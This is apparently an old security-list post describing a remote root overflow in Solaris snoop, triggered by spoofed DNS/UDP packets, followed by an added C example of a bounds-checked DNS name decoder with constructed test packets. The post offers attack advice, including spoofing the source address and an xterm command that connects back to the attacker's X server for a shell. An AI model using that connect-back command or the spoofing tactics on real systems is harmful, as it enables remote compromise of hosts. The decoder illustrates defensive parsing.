Here's a remote Solaris exploit. It is
a client-side overflow, so it's kind of interesting. It works by overflowing
a buffer in the client (snoop) when parsing network information.
We're able to leverage root access by clobbering some pointer values
with valid addresses and executing some arbitrary code. Here's the
exploit. The applications are sort of limited, even though it has
a few interesting permutations. You can spoof the UDP packet's source
address, thereby masking your attack; also, the target host may be
any host on a reachable network. The nature of the specific protocol
here (DNS) should leave most hosts open to attack (dst port 53 is
rarely filtered), and as long as you can get into the collision
domain (layer 2 segment), the attack should succeed. This means
that even if hosts are separated by a VLAN, the target host should
be compromised (however, you should change the execution string to
something other than simply loading a port shell, for the host will
still be unreachable: /usr/X/xterm -ut -display my.X.server:0 &.
The funny thing about this is that the xterm will connect back to
you. I'm not entirely sure of the legal ramifications, but if some
network traffic of unknown origin causes my host to establish
a connection to YOUR server, I can't see how the receiving X server
could be held responsible). Neat eh?
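The post describes the bug only as an overflow in snoop while parsing network data carried over UDP/53, and the exploit itself is not reproduced above. As an added illustration (editorial example, not the snoop source and not the posted exploit), the block below is the kind of DNS name decoder a sniffer runs on every untrusted packet it captures, written with the bounds checks whose absence produces this class of client-side overflow: an output-buffer check per label, a packet-length check per label, and a hop cap on compression pointers. The packets it decodes are constructed here for the example, and `DNS_MAX_HOPS` is a limit chosen for this code, not a protocol constant.

```c
/* Added illustration, not the Solaris snoop source and not the posted
 * exploit: a bounds-checked DNS name decoder of the kind a sniffer runs
 * on every untrusted UDP/53 payload. All packets below are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define DNS_MAX_NAME 255   /* RFC 1035 presentation-form name limit */
#define DNS_MAX_HOPS 16    /* cap on compression-pointer hops (chosen here) */

/* Decode the name at pkt[off] into out (NUL-terminated). Returns the bytes
 * consumed from off (up to and including the first compression pointer,
 * if any), or -1 on any malformed input. */
int dns_decode_name(const uint8_t *pkt, size_t len, size_t off,
                    char *out, size_t outlen)
{
    size_t pos = off, o = 0, consumed = 0;
    int jumped = 0, hops = 0;

    if (outlen == 0) return -1;
    for (;;) {
        if (pos >= len) return -1;                 /* ran off the packet */
        uint8_t c = pkt[pos];
        if ((c & 0xC0) == 0xC0) {                  /* compression pointer */
            if (pos + 1 >= len) return -1;
            if (++hops > DNS_MAX_HOPS) return -1;  /* pointer loop */
            size_t target = ((size_t)(c & 0x3F) << 8) | pkt[pos + 1];
            if (target >= len) return -1;
            if (!jumped) { consumed = pos + 2 - off; jumped = 1; }
            pos = target;
            continue;
        }
        if (c & 0xC0) return -1;                   /* reserved label types */
        pos++;
        if (c == 0) {                              /* root label ends the name */
            if (!jumped) consumed = pos - off;
            break;
        }
        if (pos + c > len) return -1;              /* label longer than packet */
        /* The check a fixed-size stack buffer never gets on its own: the label
         * plus its separator must fit the caller's buffer and the DNS limit. */
        if (o + c + 1 > outlen || o + c > DNS_MAX_NAME) return -1;
        memcpy(out + o, pkt + pos, c);
        o += c;
        out[o++] = '.';
        pos += c;
    }
    if (o == 0) { if (outlen < 2) return -1; out[o++] = '.'; } /* root name */
    else o--;                                      /* drop trailing dot */
    out[o] = '\0';
    return (int)consumed;
}

/* Constructed response: 12-byte header, question "www.example.com" A IN,
 * then an answer name that is a compression pointer back to offset 12. */
static const uint8_t sample[] = {
    0x12,0x34, 0x81,0x80, 0,1, 0,1, 0,0, 0,0,
    3,'w','w','w', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0,
    0,1, 0,1,
    0xC0,0x0C
};
/* Constructed: a pointer at offset 12 that refers to itself. */
static const uint8_t sample_loop[] = { 0,0,0,0,0,0,0,0,0,0,0,0, 0xC0,0x0C };
/* Constructed: a label claiming 3 bytes where only 2 remain. */
static const uint8_t sample_trunc[] = { 3,'a','b' };

int demo_question(void)        /* expect 17 bytes consumed */
{
    char name[DNS_MAX_NAME + 1];
    int n = dns_decode_name(sample, sizeof sample, 12, name, sizeof name);
    return (n >= 0 && strcmp(name, "www.example.com") == 0) ? n : -2;
}
int demo_compressed(void)      /* expect 2 bytes consumed, same name */
{
    char name[DNS_MAX_NAME + 1];
    int n = dns_decode_name(sample, sizeof sample, 33, name, sizeof name);
    return (n >= 0 && strcmp(name, "www.example.com") == 0) ? n : -2;
}
int demo_pointer_loop(void)    /* expect -1 */
{
    char name[DNS_MAX_NAME + 1];
    return dns_decode_name(sample_loop, sizeof sample_loop, 12, name, sizeof name);
}
int demo_truncated(void)       /* expect -1 */
{
    char name[DNS_MAX_NAME + 1];
    return dns_decode_name(sample_trunc, sizeof sample_trunc, 0, name, sizeof name);
}
/* Build a name of nlabels 63-byte labels (constructed) and decode it into a
 * buffer of bufsize bytes: the overlong-name case that overruns an unchecked
 * fixed buffer is reported as -1 here instead. */
int demo_overlong(int nlabels, size_t bufsize)
{
    uint8_t pkt[64 * 8 + 1];
    char name[DNS_MAX_NAME + 1];
    size_t len = 0;
    if (nlabels > 8 || bufsize > sizeof name) return -3;
    for (int i = 0; i < nlabels; i++) {
        pkt[len++] = 63;
        memset(pkt + len, 'a', 63);
        len += 63;
    }
    pkt[len++] = 0;
    return dns_decode_name(pkt, len, 0, name, bufsize);
}

int main(void)
{
    printf("question=%d compressed=%d loop=%d trunc=%d long3=%d long5=%d\n",
           demo_question(), demo_compressed(), demo_pointer_loop(),
           demo_truncated(), demo_overlong(3, 256), demo_overlong(5, 256));
    return 0;
}
```

The decoder returns the number of wire bytes consumed so a caller can advance past the name without re-walking it; the compression branch records that count before jumping, which is what keeps a self-referencing or forward pointer from being followed indefinitely in the caller's loop as well as in this one.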